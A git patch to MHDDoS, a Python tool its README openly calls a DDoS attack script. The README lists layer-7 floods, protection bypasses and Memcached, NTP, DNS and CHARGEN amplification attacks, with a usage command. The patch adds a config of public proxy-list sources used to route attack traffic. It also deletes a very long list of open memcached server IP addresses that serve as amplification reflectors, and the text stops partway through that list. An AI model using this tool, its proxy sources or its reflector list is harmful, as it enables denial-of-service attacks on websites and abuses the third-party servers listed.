From ae28158650de68bc9d5fce6f9bf045548d558729 Mon Sep 17 00:00:00 2001 From: MHProDev Date: Mon, 7 Feb 2022 01:11:26 +0330 Subject: [PATCH] Update to Version 2 :) + Added Custom Proxy Support + Added Other Option For Layer4 + Fixed Performance lag + Recoded --- .gitignore | 2 + .idea/.gitignore | 8 + README.md | 51 +- config.json | 18 + files/README.md | 1 - files/memcached_servers.txt | 58486 ---------------------------------- files/ntp_servers.txt | 236 - files/proxys/proxy.txt | 0 requirements.txt | 14 +- start.py | 2534 +- 10 files changed, 887 insertions(+), 60463 deletions(-) create mode 100644 .gitignore create mode 100644 .idea/.gitignore create mode 100644 config.json delete mode 100644 files/README.md delete mode 100644 files/memcached_servers.txt delete mode 100644 files/ntp_servers.txt create mode 100644 files/proxys/proxy.txt diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..eda8af9 --- /dev/null +++ b/.gitignore @@ -0,0 +1,2 @@ +./venv +./.idea \ No newline at end of file diff --git a/.idea/.gitignore b/.idea/.gitignore new file mode 100644 index 0000000..13566b8 --- /dev/null +++ b/.idea/.gitignore @@ -0,0 +1,8 @@ +# Default ignored files +/shelf/ +/workspace.xml +# Editor-based HTTP Client requests +/httpRequests/ +# Datasource local storage ignored files +/dataSources/ +/dataSources.local.xml diff --git a/README.md b/README.md index 60167ac..91af94c 100644 --- a/README.md +++ b/README.md @@ -1,30 +1,27 @@

aventium softworks

-

MHDDoS - DDoS Attack Script With 36 Method

+

MHDDoS - DDoS Attack Script With 36 Methods

(Code Lang - Python 3)
-

Please Don't Hit '.gov' and '.ir' Websites :)

+

Please Don't Attack '.gov' and '.ir' Websites :)

POWER

SCRIPT

-## Features And Method +## Features And Methods * 💣 Layer7 * get GET | GET Flood * post POST | POST Flood * ovh OVH | Bypass OVH * stress STRESS | Send HTTP Packet With High Byte - * ostress OSTRESS | STRESS Without Proxy * dyn DYN | A New Method With Random SubDomain * slow SLOW | Slowloris Old Method of DDoS * head HEAD | https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/HEAD - * hit HIT | POST Without PROXY * null NULL | Null UserAgent and ... * cookie COOKIE | Random Cookie PHP 'if (isset($_COOKIE))' - * brust BRUST | A Method with more header * pps PPS | Only 'GET / HTTP/1.1\r\n\r\n' * even EVEN | GET Method with more header * googleshield GSB | Google Project Shield Bypass @@ -38,36 +35,35 @@ * tcp TCP | TCP Flood Bypass * udp UDP | UDP Flood Bypass * syn SYN | SYN Flood - * vse VSE | VSE Flood Only Connection - * mem MEM | Memcached Flood - * ntp NTP | NTP Flood OLD Method Of Layer4 - -* 🏹 Layer3 - * icmp ICMP | Flood ICMP Request - * ⚔️ POD | Ping Of Death OLD Method Of DDoS + * vse VSE | Send VSE Protocol + * mem MEM | Memcached Amplification + * ntp NTP | NTP Amplification + * dns DNS | DNS Amplification + * chargen CHAR | CHARGEN Amplification + * ard ARD | ARD Amplification * ⚙️ Tools - Run With 'python3 start.py tools' - * 🌟 CFIP | Find Real IP address of Website Powered by Cloudflare - * 🔪 DNS | Show Site DNS Records - * ⚠️ PING | PING server - * 📌 CHECK | Check Website Die or no - * 😎 DSTAT | a Method show Receive And Send Bytes Size + * 🌟 CFIP | Find Real IP Address Of Websites Powered By Cloudflare + * 🔪 DNS | Show DNS Records Of Sites + * ⚠ PING | PING Servers + * 📌 CHECK | Check If Websites Status + * 😎 DSTAT | That Shows Bytes Received, bytes Sent and their amount * 🎩 Other * ❌ STOP | STOP All Attacks - * 🌠 TOOLS | Tools Console - * 👑 HELP | Show Usge Script + * 🌠 TOOLS | Console Tools + * 👑 HELP | Show Usage Script * Layer4 DDoS Script #### Issues ? * Telegram : https://t.me/DD0SChat * Discord : MH_ProDev#2681 * [GitHub][github] -#### Like the project? Leave a ⭐ star on the repository! +#### Like the project? Leave a star on the repository! ## Downloads -You can download from [GitHub Releases](https://github.com/MHProDev/MHDDoS/releases) +You can download it from [GitHub Releases](https://github.com/MHProDev/MHDDoS/releases) ### Getting Started @@ -75,18 +71,18 @@ You can download from [GitHub Releases](https://github.com/MHProDev/MHDDoS/relea * [Python3][python3] * requests -* PySocks +* Pysocks * cfscrape * icmplib * scapy --- -**Video's** +**Videos** * Aparat: https://www.aparat.com/v/bHcP9 -* YouTube : Coming soon.. +* YouTube : Coming soon... -**toturial** +**Toturial** * Aprat : https://aparat.com/v/XPn5Z * YouTube : https://youtu.be/mZilAOkLKK8 @@ -112,7 +108,6 @@ python3 start.py bypass https://example.com 5 1000 socks5.txt 100 100 [python3]: https://python.org 'Python3' [github]: https://github.com/MHProDev/MHDDoS/issues 'GitHub' -**💰 Donate:** +**💰 Donation Links:** * https://idpay.ir/mh-prodev -* bitcoincash:qrwytj0aghszlqmfnku2h5ms4fad567ueg5g9dn2nu diff --git a/config.json b/config.json new file mode 100644 index 0000000..6f9c98d --- /dev/null +++ b/config.json @@ -0,0 +1,18 @@ +{ + "proxy-providers": [ + {"type":4, "url": "https://api.proxyscrape.com/?request=displayproxies&proxytype=socks4", "timeout": 5}, + {"type":4, "url": "https://www.proxy-list.download/api/v1/get?type=socks4", "timeout": 5}, + {"type":4, "url": "https://www.proxyscan.io/download?type=socks4", "timeout": 5}, + {"type":4, "url": "https://raw.githubusercontent.com/TheSpeedX/PROXY-List/master/socks4.txt", "timeout": 5}, + {"type":5, "url": "https://api.proxyscrape.com/?request=displayproxies&proxytype=socks5", "timeout": 5}, + {"type":5, "url": "https://www.proxy-list.download/api/v1/get?type=socks5", "timeout": 5}, + {"type":5, "url": "https://gist.githubusercontent.com/Azuures/1e0cb7a1097c720b4ed2aa63acd82179/raw/97d2d6a11873ffa8ca763763f7a5dd4035bcf95f/fwefnwex", "timeout": 5}, + {"type":5, "url": "https://www.proxyscan.io/download?type=socks5", "timeout": 5}, + {"type":5, "url": "https://raw.githubusercontent.com/TheSpeedX/PROXY-List/master/socks5.txt", "timeout": 5}, + {"type":1, "url": "https://api.proxyscrape.com/?request=displayproxies&proxytype=http", "timeout": 5}, + {"type":1, "url": "https://www.proxy-list.download/api/v1/get?type=http", "timeout": 5}, + {"type":1, "url": "https://www.proxyscan.io/download?type=http", "timeout": 5}, + {"type":1, "url": "https://raw.githubusercontent.com/TheSpeedX/PROXY-List/master/http.txt", "timeout": 5} + + ] +} \ No newline at end of file diff --git a/files/README.md b/files/README.md deleted file mode 100644 index 8b13789..0000000 --- a/files/README.md +++ /dev/null @@ -1 +0,0 @@ - diff --git a/files/memcached_servers.txt b/files/memcached_servers.txt deleted file mode 100644 index 1a37b18..0000000 --- a/files/memcached_servers.txt +++ /dev/null @@ -1,58486 +0,0 @@ -75.126.166.203 -49.212.204.170 -41.77.117.26 -184.172.105.100 -107.189.35.155 -68.185.57.45 -60.251.83.156 -162.247.154.53 -212.227.158.179 -45.33.43.226 -45.61.113.27 -66.117.8.46 -46.105.60.74 -167.114.0.46 -82.102.14.32 -51.255.113.243 -51.15.74.147 -82.221.103.246 -45.58.60.192 -118.91.131.157 -103.243.181.58 -218.97.54.147 -23.104.135.174 -47.90.35.7 -199.83.212.207 -91.121.68.84 -46.182.217.28 -101.201.78.200 -23.88.82.77 -45.252.248.197 -35.201.153.233 -109.236.90.173 -5.135.224.32 -198.200.41.113 -162.144.196.181 -187.108.192.156 -69.87.197.163 -93.187.234.203 -45.114.94.202 -138.201.108.205 -123.206.47.31 -49.50.8.97 -185.174.30.214 -23.88.82.146 -176.38.163.30 -187.102.165.77 -23.244.241.31 -180.213.4.222 -91.215.216.100 -144.168.124.4 -185.174.31.152 -92.43.114.251 -200.199.229.76 -220.226.210.92 -5.32.82.235 -171.221.251.182 -66.135.60.174 -120.55.43.237 -65.60.22.19 -119.29.19.85 -132.148.146.54 -201.229.161.92 -60.190.240.74 -27.254.172.36 -94.23.173.137 -52.67.226.67 -109.169.76.68 -213.207.92.120 -34.195.104.59 -198.50.227.186 -61.161.197.204 -77.81.120.251 -79.98.29.90 -115.28.49.166 -103.99.63.166 -45.32.122.90 -115.28.37.116 -188.241.155.14 -34.224.89.134 -144.217.113.100 -85.204.97.113 -190.98.204.50 -103.246.17.68 -118.114.255.23 -5.153.250.125 -121.28.9.11 -23.244.190.41 -150.129.216.8 -178.63.83.133 -91.218.229.7 -122.114.206.93 -208.43.222.101 -217.23.11.206 -103.45.99.203 -123.57.162.168 -60.191.17.149 -120.24.225.71 -115.231.8.23 -104.207.52.109 -119.23.29.238 -41.79.8.83 -93.174.163.188 -101.201.48.152 -192.99.219.203 -188.241.222.234 -120.26.214.246 -120.26.227.121 -112.124.29.136 -47.89.46.179 -23.88.82.178 -184.173.127.13 -120.55.160.144 -192.237.176.30 -185.83.147.162 -45.117.169.74 -45.32.242.80 -139.199.101.112 -89.40.119.238 -142.44.137.58 -117.102.193.222 -207.58.147.100 -116.196.80.17 -216.177.2.33 -210.14.72.52 -123.56.4.246 -160.19.48.50 -182.92.8.106 -198.50.191.109 -218.108.53.113 -153.127.242.31 -118.178.230.236 -41.215.87.52 -51.254.149.235 -23.225.113.74 -110.173.51.142 -112.126.66.149 -42.121.236.117 -95.213.245.211 -203.195.148.16 -23.244.241.72 -47.89.176.236 -46.105.230.123 -192.169.250.133 -104.250.132.236 -43.229.78.98 -207.46.140.87 -222.186.173.173 -108.61.59.203 -200.59.5.92 -190.202.36.11 -121.17.168.252 -145.239.235.227 -49.212.214.145 -120.25.68.48 -216.131.86.196 -121.42.136.31 -37.99.135.115 -23.104.135.31 -139.255.101.6 -47.93.197.21 -122.225.204.40 -177.124.59.166 -94.138.212.36 -47.92.30.226 -39.106.188.170 -118.116.35.108 -198.1.125.246 -119.23.21.215 -121.40.164.147 -125.94.39.245 -119.141.25.137 -64.64.0.48 -115.29.49.190 -121.199.16.55 -111.205.30.74 -83.167.245.129 -130.211.244.10 -95.211.96.35 -88.99.193.203 -218.22.183.76 -116.62.117.121 -104.238.125.38 -216.131.116.74 -60.205.95.81 -115.30.2.76 -221.224.112.110 -107.183.243.194 -164.52.150.244 -45.76.152.192 -139.199.130.192 -91.121.41.111 -120.77.179.83 -49.212.191.174 -103.29.133.133 -185.4.29.1 -104.207.52.121 -172.246.101.126 -104.224.198.166 -41.76.169.74 -185.85.239.211 -201.183.226.222 -107.181.250.194 -51.254.4.191 -104.129.35.72 -59.127.110.53 -218.1.117.140 -104.207.129.3 -51.218.141.9 -121.236.159.134 -120.76.47.223 -107.6.183.138 -103.92.104.160 -64.120.123.177 -167.160.173.123 -45.76.172.67 -176.223.197.47 -202.43.110.95 -35.157.175.146 -95.163.71.105 -50.31.156.58 -112.196.72.123 -162.144.123.78 -185.82.222.213 -39.106.107.211 -112.124.108.247 -23.224.115.179 -79.137.3.41 -104.224.203.149 -93.95.99.209 -221.224.88.234 -45.61.112.45 -101.132.155.219 -106.14.191.136 -54.152.63.86 -134.119.35.89 -125.94.214.100 -83.220.174.94 -45.32.41.247 -79.143.177.222 -14.139.229.203 -103.40.162.78 -64.22.104.196 -45.43.9.34 -198.143.130.116 -149.56.22.118 -88.99.148.70 -122.114.137.26 -65.60.24.53 -192.232.199.10 -54.65.166.194 -220.249.115.198 -185.66.140.34 -54.87.46.49 -123.56.81.164 -120.27.28.14 -119.28.3.236 -185.174.28.140 -176.31.16.43 -123.206.61.242 -64.150.191.199 -31.186.100.220 -119.28.129.187 -112.74.188.128 -23.225.113.17 -204.12.216.226 -115.159.189.134 -50.2.188.222 -217.146.49.151 -120.196.115.50 -85.204.97.241 -123.30.50.74 -31.184.194.115 -51.255.113.232 -42.63.13.26 -122.49.23.40 -87.98.169.252 -54.92.227.209 -82.135.151.203 -46.245.167.18 -45.114.94.74 -62.44.111.101 -103.72.167.157 -85.226.114.120 -61.241.199.49 -52.207.229.6 -106.185.40.166 -60.205.140.6 -31.31.203.193 -23.244.241.149 -166.78.121.6 -185.174.31.223 -193.93.221.166 -118.67.212.4 -182.73.174.244 -23.225.95.40 -37.48.64.65 -64.118.92.14 -23.225.113.135 -23.104.135.130 -185.85.75.2 -123.207.248.141 -147.135.149.197 -23.248.229.93 -201.116.44.114 -118.69.34.88 -37.61.235.216 -115.28.242.117 -115.249.18.108 -112.74.80.189 -86.104.177.41 -5.39.85.154 -1.85.56.170 -101.231.137.47 -116.52.252.12 -69.175.60.45 -37.200.100.235 -176.31.16.51 -142.4.4.180 -185.58.207.218 -139.99.5.11 -45.76.239.197 -138.201.117.54 -118.123.246.86 -104.250.135.29 -188.116.54.194 -192.169.156.158 -139.162.227.147 -54.245.196.140 -217.65.2.25 -45.114.94.241 -120.76.145.188 -95.213.208.83 -139.162.104.22 -178.250.169.6 -62.220.134.53 -52.175.30.118 -183.216.68.157 -109.123.120.198 -121.42.253.70 -125.63.126.7 -104.128.228.86 -83.101.137.58 -109.235.68.102 -169.54.217.83 -115.159.161.206 -45.76.96.148 -115.28.182.154 -222.188.117.178 -120.26.72.25 -213.159.215.155 -115.159.4.36 -82.135.151.181 -37.59.149.214 -124.81.106.196 -172.246.101.235 -23.234.5.227 -172.247.51.53 -103.27.62.162 -65.60.43.185 -50.115.116.242 -192.230.132.132 -124.202.152.44 -104.203.82.243 -110.52.11.188 -185.37.228.17 -75.126.13.67 -108.179.226.63 -47.92.26.255 -60.205.147.14 -89.175.56.202 -203.189.97.144 -60.250.20.29 -203.124.104.101 -222.179.63.123 -139.196.164.142 -72.1.240.74 -64.150.180.245 -87.98.141.209 -66.254.163.13 -47.89.192.69 -114.215.197.28 -91.121.188.74 -23.248.229.25 -91.223.68.217 -2600:3c01::f03c:91ff:fee5:7583 -147.135.149.196 -149.56.241.55 -54.172.159.230 -31.7.35.51 -209.177.154.218 -85.214.37.62 -88.99.95.48 -103.101.80.75 -109.235.69.46 -54.95.228.98 -45.79.128.22 -52.204.208.155 -74.208.75.223 -121.40.49.159 -220.231.160.155 -118.178.127.155 -208.87.37.242 -5.196.108.129 -88.208.100.134 -113.33.38.234 -91.121.85.224 -167.114.150.106 -147.135.170.22 -198.200.41.72 -162.214.22.73 -77.238.122.190 -114.251.42.242 -121.199.52.14 -144.217.77.86 -66.37.12.86 -104.224.200.249 -120.24.80.151 -47.88.227.91 -216.104.35.71 -121.40.115.160 -116.25.39.242 -109.120.164.39 -115.47.123.46 -208.92.165.60 -54.198.42.9 -60.250.20.25 -188.165.55.134 -172.246.185.4 -192.96.206.39 -173.212.199.132 -123.56.253.81 -45.61.114.60 -139.196.43.147 -123.30.153.92 -75.126.206.106 -23.225.239.56 -82.177.87.105 -45.76.159.7 -82.135.151.157 -157.7.226.160 -194.58.122.115 -64.118.90.220 -172.246.101.115 -109.169.76.29 -172.246.101.182 -103.212.35.57 -147.135.187.86 -2001:720:1c14:0:205:33ff:fe48:fa32 -122.214.243.72 -192.80.147.13 -117.102.195.162 -125.227.129.169 -104.165.47.173 -186.209.152.82 -122.136.129.100 -5.39.11.217 -184.173.188.6 -69.65.56.190 -116.205.13.101 -115.146.121.227 -46.166.181.133 -119.130.115.18 -173.233.71.5 -119.23.64.171 -182.253.214.147 -104.224.203.150 -120.77.23.76 -91.203.194.26 -121.196.224.139 -160.153.36.192 -104.238.150.233 -37.143.172.4 -91.224.140.130 -78.108.80.133 -42.99.116.189 -45.32.22.16 -23.225.113.156 -119.59.119.230 -45.76.158.106 -171.221.70.165 -89.136.204.249 -45.114.94.133 -185.37.228.19 -52.221.73.202 -35.185.93.7 -163.172.232.2 -94.23.46.123 -52.6.238.224 -198.71.59.214 -5.172.14.157 -192.169.201.140 -118.193.204.67 -175.6.128.170 -185.84.65.221 -104.224.202.169 -162.220.52.156 -45.114.94.187 -138.122.227.2 -162.247.235.77 -162.247.235.77 -54.36.3.221 -80.4.252.45 -119.23.129.136 -185.60.135.206 -202.147.5.159 -35.156.18.223 -23.248.229.52 -115.159.26.196 -41.138.49.162 -109.73.168.194 -142.4.119.113 -47.93.224.244 -45.121.163.41 -196.50.194.123 -122.233.235.166 -67.55.93.23 -69.87.197.172 -210.105.9.3 -151.236.216.93 -123.138.111.163 -183.99.50.53 -94.138.213.149 -37.48.66.39 -118.193.219.44 -5.135.50.70 -119.23.24.78 -23.248.229.157 -180.76.102.143 -121.42.183.57 -34.229.199.178 -188.165.189.244 -120.25.65.222 -120.76.200.81 -54.208.10.244 -149.210.145.104 -99.192.169.185 -64.65.27.86 -58.210.81.53 -120.76.96.105 -121.41.104.218 -23.88.82.194 -92.243.15.145 -139.224.32.240 -104.207.52.101 -103.212.211.197 -103.27.238.225 -45.249.94.124 -123.56.100.231 -45.114.94.51 -172.246.101.91 -142.4.107.119 -103.99.63.61 -69.39.239.122 -91.102.160.206 -188.165.230.50 -185.81.128.124 -174.142.16.15 -119.28.78.220 -101.37.113.249 -186.103.144.35 -115.159.58.160 -176.31.104.84 -173.236.107.57 -153.120.50.201 -45.61.115.6 -23.244.241.238 -122.226.90.206 -59.42.40.231 -157.255.51.25 -185.174.29.238 -120.27.198.160 -217.168.146.27 -172.110.29.19 -45.40.163.88 -204.197.243.233 -210.71.198.116 -121.41.61.77 -103.221.222.192 -78.46.248.255 -47.92.94.5 -132.148.15.226 -139.224.234.153 -162.251.20.75 -23.88.82.122 -118.190.33.57 -52.77.148.138 -192.99.232.113 -208.77.45.27 -66.70.185.75 -47.97.98.254 -103.24.0.131 -188.132.250.94 -23.244.190.66 -180.119.94.242 -139.196.111.182 -192.165.35.199 -23.104.135.123 -23.225.95.71 -103.53.198.205 -82.102.14.34 -37.187.121.148 -222.187.253.33 -120.24.189.189 -117.78.28.131 -54.36.32.216 -216.75.37.165 -50.115.116.240 -121.41.95.196 -103.16.143.87 -115.159.195.95 -211.147.152.7 -51.254.4.188 -47.88.48.197 -133.130.72.167 -23.227.163.157 -162.220.162.154 -166.78.156.151 -23.244.241.36 -103.242.175.245 -150.129.80.45 -217.199.123.7 -209.169.1.14 -185.174.29.178 -45.35.125.44 -208.109.88.96 -60.12.148.89 -37.221.171.3 -52.192.77.58 -121.40.111.104 -45.125.236.142 -180.153.44.187 -5.79.26.206 -121.40.177.185 -119.29.206.222 -82.135.151.137 -91.121.165.200 -221.182.183.98 -120.79.13.121 -54.194.163.65 -62.140.253.230 -115.238.21.148 -47.92.111.123 -195.208.245.200 -78.110.50.121 -120.79.79.68 -213.189.63.23 -45.61.115.59 -103.43.173.87 -185.20.226.26 -158.69.175.112 -145.239.138.87 -121.42.193.9 -208.110.64.227 -192.80.147.235 -82.135.151.97 -198.154.242.181 -162.247.235.70 -45.76.149.57 -115.28.39.11 -195.154.62.144 -216.131.89.244 -164.132.83.6 -200.203.126.27 -195.144.194.234 -136.179.9.182 -42.121.109.226 -120.26.196.54 -217.25.198.244 -117.48.205.76 -144.168.123.12 -207.38.84.237 -118.193.184.208 -193.112.52.139 -66.76.40.51 -112.35.48.33 -202.103.20.247 -95.211.206.166 -172.246.101.175 -64.78.163.226 -92.63.104.183 -72.1.245.17 -162.247.233.45 -140.206.65.43 -45.61.112.44 -23.224.115.135 -91.134.232.254 -162.208.11.133 -66.135.36.185 -60.191.59.14 -47.52.144.20 -121.41.90.99 -58.56.214.126 -52.53.162.4 -115.28.168.95 -185.98.63.128 -98.129.37.131 -172.247.51.110 -139.196.44.49 -139.162.130.24 -103.75.201.134 -178.238.227.145 -216.92.255.81 -66.39.92.14 -120.76.84.69 -108.61.252.178 -123.207.236.134 -45.61.114.26 -94.127.146.58 -131.100.148.123 -72.14.188.175 -172.104.180.250 -60.12.155.236 -47.98.59.127 -77.244.223.69 -14.157.71.56 -198.200.41.79 -23.225.113.160 -183.182.44.154 -74.206.182.177 -125.212.253.173 -190.9.35.133 -69.64.61.140 -62.129.139.107 -194.58.98.144 -115.29.185.117 -185.153.221.198 -216.238.176.42 -115.159.206.168 -23.248.229.9 -132.148.16.89 -194.67.197.169 -5.39.25.60 -71.6.186.70 -91.205.172.194 -86.104.177.109 -142.4.107.250 -103.49.215.213 -115.159.45.17 -115.29.97.93 -203.76.107.20 -104.207.44.68 -66.175.221.148 -52.7.140.72 -120.26.89.251 -149.71.234.104 -54.37.13.120 -58.218.211.74 -121.41.230.84 -123.207.107.230 -54.216.178.114 -74.208.192.180 -23.244.190.82 -118.200.43.91 -23.224.115.233 -13.75.122.219 -114.112.71.145 -64.118.95.198 -199.83.212.215 -89.163.142.238 -121.42.149.62 -5.160.219.52 -114.215.201.43 -197.248.130.123 -69.30.202.75 -153.122.20.63 -160.16.143.83 -45.35.125.38 -192.80.147.39 -130.185.78.136 -217.112.131.173 -104.165.42.40 -52.78.11.105 -52.212.99.195 -123.30.110.249 -23.234.19.142 -217.182.244.28 -157.7.166.191 -120.25.243.10 -174.142.158.151 -23.244.190.76 -164.132.106.83 -47.95.124.57 -23.225.89.67 -125.72.106.54 -185.174.30.208 -64.120.123.135 -95.109.41.77 -166.63.45.97 -89.19.6.172 -213.136.86.108 -103.81.170.233 -109.73.168.216 -142.4.119.93 -198.200.41.16 -86.104.177.2 -202.63.166.23 -37.143.11.209 -162.144.146.246 -104.203.82.180 -88.214.236.136 -169.48.200.190 -122.114.155.211 -115.159.220.227 -190.147.23.61 -103.1.51.79 -103.214.170.217 -118.144.162.23 -92.63.101.200 -133.242.21.152 -23.225.95.147 -198.204.239.210 -120.77.67.135 -217.182.249.247 -118.89.242.236 -23.225.95.94 -179.190.25.18 -100.43.152.124 -92.43.113.76 -211.152.33.30 -160.16.219.183 -23.88.82.228 -60.205.93.168 -37.187.89.184 -177.129.77.55 -45.35.125.35 -85.119.155.146 -188.165.136.205 -195.230.10.181 -79.98.30.226 -167.114.141.191 -206.108.48.101 -74.52.4.38 -52.69.79.221 -192.162.112.4 -113.108.110.59 -119.29.170.230 -211.104.158.85 -101.200.76.247 -216.131.67.206 -150.95.175.43 -187.95.62.60 -45.76.90.91 -60.191.23.115 -142.4.107.76 -182.253.30.243 -104.194.233.35 -50.116.76.104 -210.188.221.83 -145.239.122.76 -45.32.194.123 -139.99.107.79 -190.152.151.180 -118.184.57.134 -109.73.168.235 -58.222.191.158 -185.69.152.47 -172.246.101.90 -82.146.62.50 -208.43.222.109 -209.126.112.99 -188.225.74.169 -193.189.75.138 -51.141.95.98 -120.92.27.171 -142.4.107.212 -23.225.89.148 -46.105.98.18 -177.135.249.123 -198.200.41.95 -109.201.149.180 -116.68.250.19 -69.87.198.116 -41.63.7.205 -132.148.135.140 -96.44.178.66 -45.119.81.134 -153.122.24.223 -121.43.61.132 -31.28.24.137 -23.225.239.89 -160.19.50.114 -82.102.14.11 -115.126.53.138 -108.170.59.196 -134.119.66.99 -119.57.170.156 -153.120.36.23 -2.44.241.210 -202.85.217.71 -103.10.86.106 -182.71.105.243 -69.50.195.54 -62.76.40.248 -210.245.90.166 -103.205.96.232 -149.202.75.108 -108.59.8.54 -112.124.29.94 -139.196.27.9 -118.192.3.68 -109.169.76.59 -139.162.96.7 -115.29.176.114 -194.58.61.2 -91.218.228.214 -158.69.36.29 -139.162.167.231 -120.24.248.218 -43.224.34.197 -47.52.35.48 -31.7.59.174 -23.225.95.177 -62.149.9.175 -79.137.76.229 -186.64.123.163 -45.114.94.93 -172.247.51.8 -78.32.71.247 -219.146.198.102 -103.81.170.249 -47.95.240.93 -121.196.208.116 -54.84.146.64 -23.225.113.110 -64.31.31.143 -121.8.255.85 -172.247.51.83 -45.125.236.91 -162.144.95.52 -23.225.89.94 -182.16.93.42 -106.75.94.68 -137.74.235.19 -92.222.95.75 -174.37.242.38 -179.43.152.34 -82.135.151.102 -23.104.135.27 -58.218.213.41 -144.217.240.245 -207.244.95.119 -129.213.120.147 -23.88.82.36 -59.110.12.230 -47.88.12.218 -97.74.239.69 -66.254.190.201 -115.29.17.233 -210.48.255.151 -91.237.99.146 -54.65.214.71 -198.44.248.77 -50.31.102.160 -118.190.7.163 -120.76.25.10 -118.190.35.63 -88.150.157.161 -176.58.126.28 -192.80.147.212 -122.155.0.224 -123.30.153.88 -23.244.241.87 -202.152.62.70 -198.200.41.4 -103.242.135.2 -95.173.161.211 -113.143.88.167 -52.53.177.53 -112.74.103.155 -195.13.163.137 -164.70.8.101 -144.168.69.148 -54.165.51.155 -120.26.100.38 -151.80.246.214 -92.222.211.68 -185.182.99.27 -82.135.151.3 -194.158.203.148 -58.213.145.91 -23.88.82.121 -192.80.147.156 -107.180.78.118 -82.135.151.53 -115.29.37.160 -23.244.190.109 -75.126.80.21 -23.225.113.131 -86.109.170.106 -23.244.190.184 -45.79.1.65 -147.135.149.198 -120.26.51.211 -176.97.97.2 -118.193.219.37 -114.215.46.146 -194.218.23.8 -23.225.89.232 -54.72.31.197 -23.224.115.157 -176.99.2.235 -123.207.20.133 -121.42.229.159 -45.124.85.117 -51.15.200.44 -119.29.116.55 -45.77.243.253 -31.186.99.188 -182.92.177.99 -94.23.212.175 -59.110.23.40 -218.4.249.173 -23.244.190.97 -139.162.46.183 -91.237.99.142 -119.36.92.59 -118.190.8.21 -121.40.56.22 -114.55.100.11 -185.26.122.27 -103.100.140.27 -120.132.2.253 -42.62.29.28 -211.155.164.149 -200.74.240.44 -120.55.61.7 -35.201.235.17 -166.48.76.88 -93.51.201.116 -65.60.5.70 -45.40.161.187 -185.206.86.23 -123.207.116.109 -124.117.240.69 -208.92.165.2 -23.248.229.234 -103.254.126.153 -188.132.228.108 -95.211.206.165 -124.128.34.241 -172.247.51.43 -162.247.99.35 -119.29.224.145 -23.244.241.210 -139.129.95.74 -216.117.137.39 -120.24.154.192 -23.225.113.211 -193.86.127.36 -113.88.101.195 -50.116.75.50 -142.0.132.209 -23.88.95.165 -119.29.243.12 -69.13.210.178 -69.20.126.59 -45.114.94.73 -72.46.128.170 -70.36.125.60 -104.238.156.212 -45.252.248.233 -177.52.160.11 -185.26.220.40 -93.115.243.10 -93.145.209.68 -54.249.46.48 -81.95.114.185 -45.114.94.41 -112.74.129.158 -213.207.92.117 -200.10.71.10 -64.118.92.5 -194.247.13.138 -37.97.191.23 -139.199.202.161 -192.80.147.244 -47.52.29.154 -23.225.95.130 -120.24.218.193 -211.157.24.155 -176.223.197.58 -125.212.250.8 -218.106.246.208 -123.206.130.75 -72.167.119.54 -45.77.37.240 -194.237.215.184 -110.164.191.132 -125.227.144.215 -222.73.243.211 -209.90.117.216 -45.252.250.176 -164.52.150.252 -120.27.162.39 -103.250.21.103 -185.174.30.219 -23.244.190.107 -198.15.85.165 -118.126.6.12 -185.23.16.5 -103.9.124.196 -169.244.148.9 -23.244.241.62 -52.169.78.174 -47.90.16.18 -123.57.176.181 -52.69.29.60 -5.199.135.199 -217.23.11.98 -23.88.158.75 -106.14.114.51 -176.53.20.46 -92.43.129.172 -185.20.227.236 -47.88.53.185 -185.86.77.185 -192.169.137.3 -139.162.60.157 -45.76.87.240 -37.230.114.189 -185.174.30.134 -220.226.210.54 -162.242.219.24 -114.105.124.110 -106.120.116.31 -46.254.16.11 -65.181.139.131 -93.175.124.147 -64.120.123.193 -47.88.77.165 -178.236.234.58 -188.165.140.183 -74.200.203.250 -114.113.126.135 -47.90.94.207 -218.106.97.157 -23.225.239.78 -67.220.184.101 -112.74.82.196 -70.36.125.39 -37.59.89.244 -192.99.78.6 -198.200.41.10 -119.235.53.125 -23.229.227.172 -123.56.222.61 -83.167.242.173 -54.208.240.137 -103.84.91.54 -164.132.6.200 -24.249.137.195 -106.39.93.82 -172.246.101.177 -86.104.177.44 -119.29.169.122 -185.88.154.194 -72.1.245.62 -69.197.184.243 -42.7.26.11 -123.207.241.137 -204.15.135.132 -31.28.24.139 -188.165.134.248 -54.199.153.47 -115.28.140.15 -35.185.226.229 -107.167.184.139 -183.111.138.193 -216.131.75.9 -218.244.144.84 -179.43.152.40 -103.48.119.144 -172.110.9.238 -125.63.60.224 -159.93.225.211 -23.88.158.123 -221.224.77.99 -96.126.103.196 -119.23.52.228 -61.145.181.172 -121.50.168.240 -23.234.26.202 -109.73.40.65 -109.235.68.110 -202.46.1.122 -81.201.140.33 -202.99.246.84 -107.158.255.222 -166.78.158.243 -177.220.144.68 -23.88.82.113 -118.125.106.187 -101.201.213.220 -172.104.167.178 -103.42.178.122 -64.120.123.210 -107.165.11.107 -89.163.240.226 -185.83.147.169 -185.83.147.169 -202.171.212.48 -43.240.12.247 -114.215.18.78 -46.226.227.113 -217.182.205.82 -144.168.74.135 -45.76.197.17 -139.129.208.132 -121.43.35.179 -112.213.94.16 -193.112.9.249 -198.200.41.33 -172.246.101.230 -23.224.115.220 -176.31.40.131 -91.221.99.157 -62.63.156.222 -103.248.253.86 -192.121.65.146 -41.185.22.58 -220.247.248.11 -59.120.215.168 -70.36.112.86 -121.43.97.213 -139.199.21.238 -54.196.244.2 -104.207.40.189 -104.130.195.223 -69.167.188.249 -45.251.88.34 -27.203.104.13 -45.61.112.55 -89.252.188.166 -50.22.159.136 -103.41.127.131 -47.91.165.16 -123.56.93.210 -164.160.163.90 -23.253.245.86 -85.249.47.210 -119.28.14.22 -120.55.89.219 -149.202.19.129 -72.14.187.167 -120.24.237.53 -212.24.103.192 -200.122.194.18 -192.80.147.10 -119.29.157.39 -210.245.18.135 -199.217.112.83 -121.201.9.152 -184.154.164.227 -106.14.45.42 -101.200.241.164 -198.61.147.93 -212.71.239.115 -23.225.239.125 -103.244.123.101 -49.212.35.189 -37.187.133.100 -216.131.67.203 -120.76.52.144 -123.57.221.105 -162.247.97.231 -199.195.234.66 -34.207.163.136 -107.23.195.231 -51.254.5.205 -120.27.194.78 -200.127.154.7 -168.235.96.107 -123.207.243.94 -23.244.241.166 -23.88.158.120 -106.75.92.142 -5.160.219.2 -172.246.101.209 -221.150.100.109 -121.43.199.192 -92.43.117.204 -218.4.188.125 -182.92.111.142 -91.197.51.150 -204.44.66.121 -218.76.35.38 -69.197.166.82 -51.15.222.60 -112.74.27.226 -125.77.194.138 -108.61.172.105 -104.224.205.103 